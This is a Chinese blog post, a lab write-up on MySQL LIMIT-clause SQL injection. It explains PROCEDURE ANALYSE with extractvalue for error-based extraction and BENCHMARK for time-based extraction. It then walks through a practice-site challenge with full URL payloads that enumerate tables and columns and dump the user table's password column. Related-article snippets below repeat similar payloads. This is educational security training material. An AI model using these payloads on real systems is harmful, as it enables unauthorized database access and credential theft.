在一个limit注入习题下的知识集合

最新推荐文章于 2022-06-14 15:12:14 发布
最新推荐文章于 2022-06-14 15:12:14 发布
阅读量1.3k 收藏
点赞数 1
文章标签: limit 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zezai3010/article/details/78790742
版权


一、mysql里面的几个函数的解释

(一) Select 查询官方解释

1. SELECT 

2. [ALL | DISTINCT | DISTINCTROW ]  

3. [HIGH_PRIORITY]  

4. [STRAIGHT_JOIN]  

5. [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]  

6. [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]  

7. select_expr [, select_expr ...]  

8. [FROM table_references  

9. [WHERE where_condition]  

10. [GROUP BY {col_name | expr | position}  

11. [ASC | DESC], ... [WITH ROLLUP]]  

12. [HAVING where_condition]  

13. [ORDER BY {col_name | expr | position}  

14. [ASC | DESC], ...]  

15. [LIMIT {[offset,] row_count | row_count OFFSET offset}]  

16. [PROCEDURE procedure_name(argument_list)]  

17. [INTO OUTFILE 'file_name' export_options  

18. INTO DUMPFILE 'file_name' 

19. INTO var_name [, var_name]]  

20. [FOR UPDATE | LOCK IN SHARE MODE]]  

可知如下语句:

Select *****from*****where*****group by*****asc/desc***with rollup*****having*****order by*****asc/desc***limit**procedure*****into****for updata****

也即是select后面还可以有很多标识句构成的语句。

(二) Limit注入解析

1、问题由来:

参考:http://netsecurity.51cto.com/art/201501/464519.htm

 

在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】

问题的关键在于,语句中有order by 关键字,我们知道,mysql 中在order by 前面可以使用union 关键字,所以如果注入点前面没有order by 关键字,就可以顺利的使用union 关键字,但是现在的情况是,注入点前面有order by 关键字,这个问题在stackoverflow 上和sla.ckers上都有讨论,但是都没有什么有效的解决办法。

2、问题分析

limit 关键字后面还有 PROCEDURE 和 INTO 关键字,into 关键字可以用来写文件,但这在本文中不重要,这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)。

尝试用这个存储过程:

1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);  

2. ERROR 1386 (HY000): Can't use ORDER clause with this procedure 

 

ANALYSE支持两个参数,试试两个参数:

1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);  

2. ERROR 1386 (HY000): Can't use ORDER clause with this procedure 

 

依然无效,尝试在 ANALYSE 中插入 sql 语句:

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);  

响应如下:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’ 

事实证明,sleep 没有被执行,最终,我尝试了如下payload :

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);  

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' 

 

啊哈,上面的方法就是常见的报错注入,所以,如果注入点支持报错,那所有问题都ok,但是如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)  

有意思的是,这里不能用sleep而只能用 BENCHMARK。

3、一些函数解释

1、procedure analyse()

语法如下

select column from table_name procedure analyse();

PROCEDURE ANALYSE 通过分析select查询结果对现有的表的每一列给出优化的建议。

参考:http://blog.youkuaiyun.com/yufaw/article/details/7657923

2、ExtractValue()

XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML()

EXTRACTVALUE (XML_document, XPath_string); 
第一个参数:XML_document是String格式,为XML文档对象的名称
第二个参数:XPath_string (Xpath格式的字符串). 
作用:从目标XML中返回包含所查询值的字符串

UPDATEXML (XML_document, XPath_string, new_value); 
第一个参数:XML_document是String格式,为XML文档对象的名称
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 
第三个参数:new_value,String格式,替换查找到的符合条件的数据 
作用:改变文档中符合条件的节点的值

3、rand()函数

获取一个随机值

Order by rand():随机排列

4、concat()函数

连接函数,比如连接字符串。

5、Version()

获取版本号

6、

Procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

就是依靠analyse函数,查询版本号,返回信错信息。

 

二、习题解答

0x1 打开网址:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1

发现如下内容:

 

通过对start以及num参数测试,发现只改变start的时候并且num=0或者不为null或者存在的时候,会显示不同界面。

0x2 进行测试

Payloadhttp://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2%df' order by 3 %23

发现都会返回

类似错误。所以肯定是都start以及num进行了limit限制。这就涉及到了limit注入。

0x3 进行limit注入分析

查找网上,发现 可以如下构造:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

返回;

 

返回了版本号,说明存在显错注入。

那么就可以把version()换成sql注入语句。

0x4 常规注入

1 查询数据库

Payload:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2  procedure analyse(extractvalue(rand(),concat(0x3a,database())),1);

得到:

 

2 查询表

Payload

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2  procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=0x6d79646273))),1);

得到:

 

3 查询段

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2  procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1);

得到user表里面的段:

 

id,username,password,lastloginI 共计4个段

4 查询段内容

Payload:

http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=1&num=2  procedure analyse(extractvalue(rand(),concat(0x3a,(select group_concat(password) from user))),1);

得到:

 

得到FLAGmyflagishere

VIS-Wing
关注
【漏洞挖掘】——127、 Limit注入刨析
Fly_鹏程万里
07-03 329
此方法适用于MySQL 5.x中,在limit语句后面的注入,常见的后台SQL语句如下所示:上面语句包含了ORDER BY,MySQL中UNION语句不能在ORDER BY的后面,不然这里利用UNION就可以很容易的读取数据了,下面看看在MySQL 5中的SELECT语法:从上面可以看到在LIMIT后面可以跟一个函数——PROCEDURE,那么使用PROCEDURE函数能否注入呢?
在图片注入(伪静态注入习题情况下得到的知识集合
zezai3010的博客
12-13 2696
一、伪静态注入 (一)伪静态定义: 为了实时的显示一些信息。或者还想运用动态脚本解决一些问题。不能用静态的方式来展示网站内容。伪静态只是改变了URL的表现形式,实际上还是动态页面。 例:http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/ 和http://lab1.xseclab.com/sqli6_f37a4a60
Mysql下Limit注入方法(此方法仅适用于5.0.0<mysql<5.6.6的版本)
weixin_34115824的博客
07-27 236
SQL语句类似下面这样:(此方法仅适用于5.0.0<mysql<5.6.6的版本) SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT注入点) 问题的关键在于,语句中有 order by 关键字,mysql 中在 order by 前面可以使用 union 关键字,所以如果注入点前面没有 order b...
mysql注入limit 注入
Sp4rkW的博客
03-05 4706
limit注入基本常见的分两种场景,存在`order by`与否,本文将复现尝试各种limit注入的姿势与讨论不同mysql版本对注入payload的影响。作者能力有限,有更多思路欢迎讨论~
limit注入
左手诗人 右手剑客
07-07 216
page=4%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1);%23
order by/limit 注入
阿金正传
04-19 2050
类似的代码 php code SELET * FROM page WHERE id=1 ORDER BY id [参数] ASC [参数] LIMIT 10,10 [参数] [参数] – 为存在注入的参数 我们不能在这注入上使用union,所以我们只能使用其他我们可以利用的   在order by id [参数] 之后使用双重查询   假设有以下网站 code: http://
SQL漏洞注入(附实战练习)
Matheus的博客
05-15 6217
环境部署 phpstudy、DVWA、SQLI-LABS(学习sql注入平台)、upload-labs、课程源码环境web SQL注入原理 SQL 注入就是指 web 应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的 参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql 语句来 实现对数据库的任意操作。 举例说明: id=id=id=_GET[‘id’] sql=SELECT∗FROMusersWHEREid=sql=SELECT * FROM users WHERE
一个简单的 SQL 学习大纲,旨在帮助你系统地学习 SQL
最新发布
04-22
- **SQL 练习题**:通过在线平台或书籍提供的练习题,加深对SQL语法的理解。 - **实际项目**:参与到真实的项目中去,例如为一个小型企业设计数据库模型,并实现数据的增删改查功能。 - **开源项目贡献**:参与开源...
Oracle的sql语句练习题及参考答案
10-26
在“Oracle的SQL语句练习题及参考答案”中,我们很可能会遇到各种与`SELECT`语句相关的练习,这是SQL中最基础且最重要的部分。 `SELECT`语句用于从数据库中检索数据,其基本语法结构如下: ```sql SELECT column1,...
2万字软件测试面试题干货带答案,反手我就一个收藏
m0_57290404的博客
06-14 1881
需求分析、编写测试用例、评审测试用例、搭建环境、等待程序开发包、部署程序开发包、冒烟测试、执行具体的测试用例细节、Bug 跟踪处理回归测试、N 轮之后满足需求,测试结束第一类标准:测试超过了预定时间,则停止测试。第二类标准:执行了所有的测试用例,但并没有发现故障,则停止测试。第三类标准:使用特定的测试用例设计方案作为判断测试停止的基础第四类标准:正面指出停止测试的具体要求,即停止测试的标准可定义为查出某一预订数目的故障。第五类标准:根据单位时间内查出故障的数量决定是否停止测试1) 应当把“尽早地和不断地进行
mybatis如何防止SQL注入
01-05
mybatis如何防止SQL注入
limit测试
u011982711的博客
11-13 276
explain select sql_no_cache * from record order by regtime asc limit 20000,30; explain select sql_no_cache r.* from record r join (select  id from record order by regtime asc limit 20000,30) t  on ...
sql-lab关于limit注入(网络信息安全实验室 第四题)
weixin_43803070的博客
04-27 2057
关于limit注入(记一次sql注入) 1.函数解释 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数,分别是ExtractValue()和UpdateXML() 1)extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是Str...
mysql limit后的注入
ztaos的博客
12-04 666
mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1); 例子:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1    procedure
Sql注入limit注入的学习
bylfsj的博客
03-19 2778
0x01 前言 今天听学长们交流漏洞挖掘的经验,提到了Limit注入,借此来学习一下limit注入 0x02 知识介绍 limit LIMIT[位置偏移量,]行数 其中,中括号里面的参数是可选参数,位置偏移量是指MySQL查询分析器要从哪一行开始显示,索引值从0开始,即第一条记录位置偏移量是0,第二条记录的位置偏移量是1,依此类推...,第二个参数为“行数”即指示返回的记录条数。 效果如...
mysql中limit注入点利用(报错注入
qq_41320638的博客
11-11 606
limit后面可接procedure analyse()函数,该函数原本是用来优化表结构的 我们可以在里面插入extractvalue()函数来进行报错注入 如下所示: http://xxxx.com/index.php?s=5 procedure analyse(extractvalue(rand(),concat(0x7e,(select group_concat(0x7e,sche...
mysql limit 注入_[转载]Mysql下Limit注入方法
weixin_39517797的博客
01-19 200
此方法适用于MySQL 5.x中,在limit语句后面的注入例如:1SELECTfieldFROMtableWHEREid > 0ORDERBYid LIMIT injection_point上面的语句包含了ORDER BY,MySQL当中UNION语句不能在ORDER BY的后面,否则利用UNION很容易就可以读取数据了,看看在MySQL 5中的SELECT语法:01SELEC...
mysql+limit+sql注入_sql注入limit注入和五种时间盲注姿势
weixin_28803437的博客
01-19 744
0x00前言limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT*FROMtableLIMIT[offset,]rows...
mybatis limit注入修复
09-01
Mybatis是一款流行的Java持久化框架,它使用了SQL映射文件来定义数据库操作。其中的limit注入是指在SQL语句中使用limit关键字来限制查询结果的返回数量,从而实现分页查询。 然而,limit注入可能存在一些安全隐患,容易受到恶意用户的攻击。为了修复这个问题,我们可以采取以下几个步骤: 1. 参数校验:在接收客户端传递的limit参数之前,需要进行严格的参数校验。确保参数的合法性,比如限制传入参数的范围、类型等。 2. 参数绑定:使用Mybatis提供的参数绑定功能来绑定limit参数。这样可以确保limit参数的值是安全可靠的,避免恶意用户通过传入非法参数对数据库进行攻击。 3. 预编译语句:在设置limit参数之前,使用Mybatis的预编译语句功能来对SQL语句进行预处理。这样可以防止恶意用户通过注入攻击修改SQL语句的结构或逻辑。 4. 日志输出:启用Mybatis的日志输出功能,将SQL语句的执行过程输出到日志文件中。这样可以对SQL注入攻击进行监控,并及时发现异常情况。 通过以上措施,我们可以修复Mybatis中的limit注入问题,提高系统的安全性。同时,建议在使用Mybatis时及时更新框架版本,以获取最新的安全补丁和功能改进。此外,也可以结合其他安全框架或工具来进一步加强系统的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值